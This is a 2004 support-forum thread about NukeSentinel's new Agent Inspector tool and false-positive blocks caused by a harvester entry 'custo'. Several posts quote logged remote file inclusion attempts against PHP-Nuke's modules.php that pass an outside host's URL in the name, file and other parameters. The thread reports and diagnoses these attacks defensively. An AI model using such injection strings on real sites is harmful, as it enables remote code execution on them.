Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™
Author Message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Fri Jun 25, 2004 7:42 am Reply with quote

Sentinel traps various harvesters by examining the browser agent that is being used/forged. The list of harvesters is available and maintainable through the Sentinel™ administration panel. It is not always readily apparent why a particular agent gets flagged. There is now a module called Only registered users can see links on this board! Get registered or login! under my Site Navigation menu. Whenever you need an explanation as to what harvester entry trapped the agent that is in the email that Sentinel™ sent you, just use this utility.

Let me know if you find bugs or think it needs enhancing.
 
View user's profile Send private message
Salieri
Hangin' Around


Joined: Nov 07, 2003
Posts: 33

PostPosted: Fri Jun 25, 2004 8:36 am Reply with quote

Has this feature been implemented in the Sentinal packages?

Sounds great. Smile
 
View user's profile Send private message
Raven
PostPosted: Fri Jun 25, 2004 8:40 am Reply with quote

In the next release (v2.0) the Agent that trapped it will be included in the Email.
 
squiresmk
Regular
Regular


Joined: May 31, 2004
Posts: 95
Location: NY

PostPosted: Fri Jun 25, 2004 9:04 am Reply with quote

Sentinel 2.0 is looking extremely awesome.

"There is no obvious match for ==> an obvious match.
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums."

_________________
Captain of the Internet Debate Team. 
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
dean
Worker
Worker


Joined: Apr 14, 2004
Posts: 193

PostPosted: Fri Jun 25, 2004 9:55 pm Reply with quote

Received this notification and no obvious conclusion was provided by the new Explainer:

Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String: alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/&cat=http://217.59.104.226/&pos=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET
 
View user's profile Send private message
xfsunolesphp
Regular
Regular


Joined: Aug 23, 2003
Posts: 77

PostPosted: Fri Jun 25, 2004 10:07 pm Reply with quote

it appear, it trying to hack your site in bad way.
 
View user's profile Send private message
sharlein
Member Emeritus


Joined: Nov 19, 2002
Posts: 322
Location: On the Road

PostPosted: Fri Jun 25, 2004 10:11 pm Reply with quote

Would this be considered a False Positive (using Agent Inspector):
Code:
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo

 
Thanks, Steve

_________________
Give Me Ambiguity Or Give Me Something Else! 
View user's profile Send private message
sixonetonoffun
Spouse Contemplates Divorce


Joined: Jan 02, 2003
Posts: 2496

PostPosted: Fri Jun 25, 2004 10:17 pm Reply with quote

Yep would be best to remove custo from the list until we can figure out a way to catch it without killing of every user agent with customer or custom in it.

_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 
View user's profile Send private message
sharlein
PostPosted: Fri Jun 25, 2004 10:30 pm Reply with quote

Thank You
 
BobMarion
Former Admin in Good Standing


Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

PostPosted: Fri Jun 25, 2004 10:31 pm Reply with quote

The email above shows that there was a trip in the "Filter" blocker. This is done when someone tries to pass Only registered users can see links on this board! Get registered or login! thru the name variable. Had it not been tripped by a true hack it would have been tripped by the "libcurl" harvester list string match.

_________________
Bob Marion
Codito Ergo Sum
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Send e-mail Visit poster's website
sharlein
PostPosted: Fri Jun 25, 2004 10:55 pm Reply with quote

That IP listed above appears to be trying to hack a lot of Nuke sites. They tried mine, but Sentinel caught them. Excellent work! Thank you
 
Himmel
Regular
Regular


Joined: May 08, 2004
Posts: 77

PostPosted: Sat Jun 26, 2004 4:30 am Reply with quote

Offtopic..same ip here...Sentinel saved my website!
Ontopic: Thx Raven for your agent inspector..its great and easy to use.
Cant wait for 2.0. Very Happy
 
View user's profile Send private message
GanjaUK
Life Cycles Becoming CPU Cycles


Joined: Feb 14, 2004
Posts: 633
Location: England

PostPosted: Sat Jun 26, 2004 8:35 am Reply with quote

I got some "abuse" blocked yesterday, same IP again.

Code:


modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&sid=http://217.59.104.226/


We must all have places in some script kiddies little black book. HitsFan

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
bretonmage
Hangin' Around


Joined: Mar 30, 2004
Posts: 34

PostPosted: Sat Jun 26, 2004 9:29 am Reply with quote

Yep, even I've got the same hack attempt:
Code:
modules.php?name=http://217.59.104.226/&page=http://217.59.104.226/

modules.php?name=http://217.59.104.226/&pa=http://217.59.104.226/&pid=http://217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&p=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&meta=http%3A//217.59.104.226/&cat=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&album=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/


All in all, I have around 20 of the same hack attempt with that IP.
 
View user's profile Send private message
SmackDaddy
Involved
Involved


Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH

PostPosted: Sun Jun 27, 2004 11:42 pm Reply with quote

Raven wrote:
In the next release (v2.0) the Agent that trapped it will be included in the Email.


So with this being the case, what you are saying is that your Agent Inspector won't be a block you'll need to be releasing, correct?

And I see according to Bob's site, that 2.0 is *TENTATIVELY* due out in a week or so (July 4th-ish).....so that's good! Thanks for the dedication and efforts of the Sentinel Crew!
 
View user's profile Send private message Send e-mail Visit poster's website
Raven
PostPosted: Mon Jun 28, 2004 4:02 am Reply with quote

That is correct. In v2.0 you should see the Reason more clearly defined in the Admin email.
 
ConViCT
New Member
New Member


Joined: Oct 18, 2002
Posts: 21

PostPosted: Wed Jul 07, 2004 1:30 pm Reply with quote

I am getting a different Agent -Abuse email, here is where it is pointing to:

mydomain.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0

It is blocking people, but the utility doesn't explain why....

Any ideas?

Thanks,

ConViCt

EDIT NOTE: I use the same string and do not get banned, but poeple outside are?
 
View user's profile Send private message Visit poster's website
Raven
PostPosted: Wed Jul 07, 2004 1:41 pm Reply with quote

Please post the actual top content of your email but just mask your domain, like this
Code:
Date & Time: 2004-06-25 05:19:52 

Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Agent
--------------------
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer)
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET
 
ConViCT
PostPosted: Wed Jul 07, 2004 1:45 pm Reply with quote

Doh! Sorry about that, here it is:

Date & Time: 2004-07-07 12:11:46
Blocked IP: 68.13.204.14
User ID: Anonymous (1)
Reason: Abuse - AGENT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
Query String: Only registered users can see links on this board! Get registered or login!
Forwarded For: none
Client IP: none
Remote Address: 68.13.204.14
Remote Port: 1831
Request Method: GET
--------------------
Who-Is for IP
OrgName: Cox Communications Inc.
OrgID: CXA
Address: 1400 Lake Hearn Drive
City: Atlanta
StateProv: GA
PostalCode: 30319
Country: US

NetRange: 68.0.0.0 - 68.15.255.255
CIDR: 68.0.0.0/12
NetName: COX-ATLANTA
NetHandle: NET-68-0-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: NS.COX.NET
NameServer: NS.WEST.COX.NET
NameServer: NS.EAST.COX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-12
Updated: 2002-08-21

TechHandle: IC146-ARIN
TechName: Cox Communications, Inc
TechPhone: +1-404-269-7626
TechEmail: Only registered users can see links on this board! Get registered or login!

OrgAbuseHandle: IC146-ARIN
OrgAbuseName: Cox Communications, Inc
OrgAbusePhone: +1-404-269-7626
OrgAbuseEmail: Only registered users can see links on this board! Get registered or login!

OrgTechHandle: WILLI-ARIN
OrgTechName: Williams, Matt
OrgTechPhone: +1-404-269-7626
OrgTechEmail: Only registered users can see links on this board! Get registered or login!

Thanks,

ConViCt
 
Raven
PostPosted: Wed Jul 07, 2004 2:01 pm Reply with quote

Try using the Agent Inspector on that Agent string. That will tell you why Wink
 
ConViCT
PostPosted: Wed Jul 07, 2004 2:11 pm Reply with quote

hmmmm, I must be doing something wrong then, as I post it in the Agent Inspector and get this:

There is no obvious match for ==> Only registered users can see links on this board! Get registered or login!
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums.

I tried placing the Only registered users can see links on this board! Get registered or login! before it also but it gave me the same error.....

What am I dong wrong?

Thanks,
ConViCt
 
Raven
PostPosted: Wed Jul 07, 2004 2:20 pm Reply with quote

No, the USER AGENT string Bang Head Mr. Green

Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
 
ConViCT
PostPosted: Wed Jul 07, 2004 2:26 pm Reply with quote

Ahhhhhhhh! RavensScripts

Thanks Raven!

But what does:Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo mean?

custo?

Huh?

Thanks so much for your help!
 
ConViCT
PostPosted: Wed Jul 07, 2004 2:28 pm Reply with quote

Something else I just noticed....every single block by Sentinel has come from Cox.net...
 
ConViCT
PostPosted: Wed Jul 07, 2004 2:34 pm Reply with quote

Never mind figured it out! Noticed in another post that Custo shoud be removed from the harvester list!

Thanks so much Raven, You Rock!

ConViCt
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©